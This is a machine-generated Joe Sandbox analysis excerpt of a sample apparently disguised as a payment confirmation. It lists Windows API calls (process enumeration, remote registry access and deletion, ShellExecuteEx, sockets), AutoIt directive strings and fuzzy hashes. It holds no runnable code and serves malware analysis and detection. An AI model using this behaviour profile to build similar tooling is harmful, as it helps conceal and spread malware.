                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: e026578b4f93f90202701ea51f52fc21fd826f7460a5e49262da02e76f874ee6
                                          • Instruction ID: 5eaa938b03ac8a0b675425edeffbd4cca5732dabcf2ec14c09628426d8d56ccc
                                          • Opcode Fuzzy Hash: e026578b4f93f90202701ea51f52fc21fd826f7460a5e49262da02e76f874ee6
                                          • Instruction Fuzzy Hash: 76C182355183019FC724EF68C894A6BB7E4FFA5314F40492DE99A973A0EB31ED05CB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 683f6436cabf3380b7e715f7514679dc5ef7df09cd1d9925a2f68f6d80ae90d7
                                          • Instruction ID: 21167f1d18355e59aaaedd15954ebf43479d6e5a427976582174af57d8b6f1fe
                                          • Opcode Fuzzy Hash: 683f6436cabf3380b7e715f7514679dc5ef7df09cd1d9925a2f68f6d80ae90d7
                                          • Instruction Fuzzy Hash: 54717A7191010AEFDB14CF98C998EBEBF78FF89314F148159EA15AA251C734AA41CFA4
                                          APIs
                                          • _memset.LIBCMT ref: 0134214B
                                          • _memset.LIBCMT ref: 01342214
                                          • ShellExecuteExW.SHELL32(?), ref: 01342259
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • CloseHandle.KERNEL32(00000000), ref: 01342320
                                          • FreeLibrary.KERNEL32(00000000), ref: 0134232F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 4082843840-2766056989
                                          • Opcode ID: 8d06cab5c140707f907809f254c89ee597c3ad4d25b30cbc81535100717ef8b2
                                          • Instruction ID: 4b5120bcfe87a1d24dd225c93c383ac5c177283e1c251da42cfca32037506aae
                                          • Opcode Fuzzy Hash: 8d06cab5c140707f907809f254c89ee597c3ad4d25b30cbc81535100717ef8b2
                                          • Instruction Fuzzy Hash: B8717A75A1061ADFCB15EFA8D8949AEBBF5FF48314F048059E95ABB350DB30AD40CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 43448f3d4507d504d8b5d345cc344289d403daa8209e591f19993049243096db
                                          • Instruction ID: b494f5041008838f4208bc1ef909daabe50c53bb08e270fd25d19f44e397cf71
                                          • Opcode Fuzzy Hash: 43448f3d4507d504d8b5d345cc344289d403daa8209e591f19993049243096db
                                          • Instruction Fuzzy Hash: 0251F4B0A187E53DFB36633CCC45BBABFA95F06308F088589E2D5468C2C6D9E884D751
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 3c1b974dc08cb85e16f10043bf2c512500c40c01b2bba58393e6d579adbe5dee
                                          • Instruction ID: 64d0c9624ce08b4bb8fc7840bc5ded21b58fb2e58de4e5dff8706e152f7597b9
                                          • Opcode Fuzzy Hash: 3c1b974dc08cb85e16f10043bf2c512500c40c01b2bba58393e6d579adbe5dee
                                          • Instruction Fuzzy Hash: 8F51F9B06047E67DFB37A72C8C45B76BF995B06308F088489E2F55A8C2D3D5E898DB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: a9771d9efc8cbdd3b680eff6a6b16d632d282a0dd7b2c69768dc139d52c130df
                                          • Instruction ID: 36f1988a887cf7204d34179ba9bf0774bef494bc8a6bdbb8f2a63d527b8afdcc
                                          • Opcode Fuzzy Hash: a9771d9efc8cbdd3b680eff6a6b16d632d282a0dd7b2c69768dc139d52c130df
                                          • Instruction Fuzzy Hash: 75417E65C2022575CB12EBFCC889ACFBBECAF15314F548866D519F3160EA30E26487A5
                                          APIs
                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0137DBF0), ref: 01339409
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339416
                                          • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0133943A
                                          • #16.WSOCK32(?,?,00000000,00000000), ref: 01339452
                                          • _strlen.LIBCMT ref: 01339484
                                          • _memmove.LIBCMT ref: 013394CA
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013394F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_memmove_strlenselect
                                          • String ID:
                                          • API String ID: 2795762555-0
                                          • Opcode ID: d396ec3f5094ffd3a3b24a02eb3553134015b58eb6c507c63d1599414468d82c
                                          • Instruction ID: 49e08b9648816feda1ce8080e89a38c3f415e0dd8b9908f37e438bc019e09c46
                                          • Opcode Fuzzy Hash: d396ec3f5094ffd3a3b24a02eb3553134015b58eb6c507c63d1599414468d82c
                                          • Instruction Fuzzy Hash: F4418475600109EFCB14EFA8C998FAEB7BDEF58318F108159E516A72D1DB74AE00CB64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          • Opcode ID: 8cabceb26c67a39137bdec641229f95d46dc73dc4bfca81e21fa6675035a72f0
                                          • Instruction ID: 4c170bd85a280d98fea098c9cc5c1172818e2b5edc4693556c589b619504b2da
                                          • Opcode Fuzzy Hash: 8cabceb26c67a39137bdec641229f95d46dc73dc4bfca81e21fa6675035a72f0
                                          • Instruction Fuzzy Hash: B141E239A01108ABEB20DB6CCC48FA9BFEDEB09324F055255EA56A72E1C770BD01DB50
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 01343C92
                                          • RegOpenKeyExW.ADVAPI32 ref: 01343CBC
                                          • FreeLibrary.KERNEL32(00000000), ref: 01343D71
                                            • Part of subcall function 01343C63: RegCloseKey.ADVAPI32(?), ref: 01343CD9
                                            • Part of subcall function 01343C63: FreeLibrary.KERNEL32(?), ref: 01343D2B
                                            • Part of subcall function 01343C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01343D4E
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 01343D16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 84bb0f2efdc22c37afd75593d4281a437118dc0ef984a56473a55c613724addd
                                          • Instruction ID: c21a57d7072ea16ffda779ae8f89c42d984afc2012dabfb36a0aaf8de0e05d46
                                          • Opcode Fuzzy Hash: 84bb0f2efdc22c37afd75593d4281a437118dc0ef984a56473a55c613724addd
                                          • Instruction Fuzzy Hash: F6312B71A00219BFEB159FD4DC89EFEBBBCFF09344F00416AE552E3150D670AA498B60
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01321734
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0132175A
                                          • SysAllocString.OLEAUT32(00000000), ref: 0132175D
                                          • SysAllocString.OLEAUT32(?), ref: 0132177B
                                          • SysFreeString.OLEAUT32(?), ref: 01321784
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 013217A9
                                          • SysAllocString.OLEAUT32(?), ref: 013217B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: d23a850cc230f02167d3a10cc3be1cafdad31b27b0dc2db988d7eef1224db273
                                          • Instruction ID: c3e4b84b7ac230d2353537eee77ee14ee8b3dc9bfff19508c0ea99c30e8e563c
                                          • Opcode Fuzzy Hash: d23a850cc230f02167d3a10cc3be1cafdad31b27b0dc2db988d7eef1224db273
                                          • Instruction Fuzzy Hash: 6921B275600219AFDB11ABACCD88CEF77ECEB49364B008125F945DB291DB70ED418764
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                          • lstrcmpiW.KERNEL32(?,?), ref: 01326A2B
                                          • _wcscmp.LIBCMT ref: 01326A49
                                          • MoveFileW.KERNEL32 ref: 01326A62
                                          • _wcscat.LIBCMT ref: 01326AA4
                                          • SHFileOperationW.SHELL32(?), ref: 01326B0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$FullMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 2594697848-1173974218
                                          • Opcode ID: 885f51a1542624fcec4033e6f1d118216447c95d53f1177be3021d3c605d42c2
                                          • Instruction ID: 4e916ff3e119a60c7c21553bbeb60e11b95573054440d45c725681d12a95af7b
                                          • Opcode Fuzzy Hash: 885f51a1542624fcec4033e6f1d118216447c95d53f1177be3021d3c605d42c2
                                          • Instruction Fuzzy Hash: B33114B1901229AADF61FFB8D845ADDB7B8AF18304F5045EAE905E3141EB30D789CF64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 1038674560-2734436370
                                          • Opcode ID: abbf483283bafa316d056cff54ad2ead76f5e95d809a4da1c2ace0b1b3b62847
                                          • Instruction ID: 653cef0ac1883853c9735cf04ad6841963187431e77416bd3a65274ec63c1e41
                                          • Opcode Fuzzy Hash: abbf483283bafa316d056cff54ad2ead76f5e95d809a4da1c2ace0b1b3b62847
                                          • Instruction Fuzzy Hash: 1B214C3210453676D636B67C9C05FBB73ECEF6934CF008029F546971C4EBA99982C3A0
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0132180D
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01321833
                                          • SysAllocString.OLEAUT32(00000000), ref: 01321836
                                          • SysAllocString.OLEAUT32 ref: 01321857
                                          • SysFreeString.OLEAUT32 ref: 01321860
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0132187A
                                          • SysAllocString.OLEAUT32(?), ref: 01321888
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: a826c408b180274d5624dd00488c46c9c30ef9993d8c45153891258b8efdaa0b
                                          • Instruction ID: ecf44309e62ef94adf4d6c4cfd2716c7977e400ce202e7c83722822912f9bff7
                                          • Opcode Fuzzy Hash: a826c408b180274d5624dd00488c46c9c30ef9993d8c45153891258b8efdaa0b
                                          • Instruction Fuzzy Hash: AB217135600214AFDB11ABECDD88DBA7BECEF09364B408125F955DB2A5DAB0EC418B64
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0134A13B
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0134A148
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0134A153
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0134A162
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0134A16E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: 7f4f433c6d33048c417f175d699d84ecce01db1fcf4b0d9b12cea2e6473f56d2
                                          • Instruction ID: e996ed3f3871f4ae3ed91206a9cde79fd4cc6ccab3ff9844bbcfcf643edbbc31
                                          • Opcode Fuzzy Hash: 7f4f433c6d33048c417f175d699d84ecce01db1fcf4b0d9b12cea2e6473f56d2
                                          • Instruction Fuzzy Hash: 8A1190B215021DBFEF114E65CC85EE77F5DEF08798F014215FA09A6090C676AC21DBA0
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 012FC6C0
                                          • GetWindowRect.USER32(?,?), ref: 012FC701
                                          • ScreenToClient.USER32(?,?), ref: 012FC729
                                          • GetClientRect.USER32(?,?), ref: 012FC856
                                          • GetWindowRect.USER32(?,?), ref: 012FC86F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 01341B09
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 01341B17
                                          • __wsplitpath.LIBCMT ref: 01341B45
                                            • Part of subcall function 0130297D: __wsplitpath_helper.LIBCMT ref: 013029BD
                                          • _wcscat.LIBCMT ref: 01341B5A
                                          • Process32NextW.KERNEL32(00000000,?), ref: 01341BD0
                                          • CloseHandle.KERNEL32(00000000), ref: 01341BE2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                          • String ID:
                                          • API String ID: 1380811348-0
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342FA0
                                          • RegOpenKeyExW.ADVAPI32 ref: 01342FE0
                                          • RegCloseKey.ADVAPI32(?), ref: 01343003
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0134302C
                                          • RegCloseKey.ADVAPI32(?), ref: 0134306F
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0134307C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$_wcscat
                                          • String ID:
                                          • API String ID: 2037614760-0
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 01322AF6
                                          • VariantClear.OLEAUT32(00000013), ref: 01322B68
                                          • VariantClear.OLEAUT32(00000000), ref: 01322BC3
                                          • _memmove.LIBCMT ref: 01322BED
                                          • VariantClear.OLEAUT32(?), ref: 01322C3A
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01322C68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          APIs
